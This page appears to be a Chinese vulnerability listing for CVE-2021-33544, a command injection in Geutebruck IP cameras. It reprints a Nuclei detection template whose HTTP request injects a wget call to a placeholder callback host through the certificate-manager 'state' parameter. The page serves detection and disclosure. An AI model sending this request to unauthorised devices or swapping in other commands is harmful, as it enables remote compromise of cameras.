CVE-2021-33544: Geutebruck - Remote Command Injection

日期: 2025-08-01 | 影响软件: Geutebruck | POC: 已公开

漏洞描述

Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

PoC代码[已公开]

id: CVE-2021-33544

info:
  name: Geutebruck - Remote Command Injection
  author: gy741
  severity: high
  description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network.
  remediation: |
    Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability.
  reference:
    - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
    - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/
    - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33544
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-33544
    cwe-id: CWE-78
    epss-score: 0.93643
    epss-percentile: 0.99838
    cpe: cpe:2.3:h:geutebrueck:g-cam_ebc-2110:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: geutebrueck
    product: g-cam_ebc-2110
  tags: cve2021,cve,geutebruck,rce,oast,geutebrueck

http:
  - raw:
      - |
        GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a004730450221008b4e9538370cfd840267129163f1a2b9063b598cbbfaff9c35339075d4441cda02203a18f54f046de465ffc42b80b641940f2be5da614c9177baa021b37049fc0541:922c64590222798bb761d5b6d8e72950

相关漏洞推荐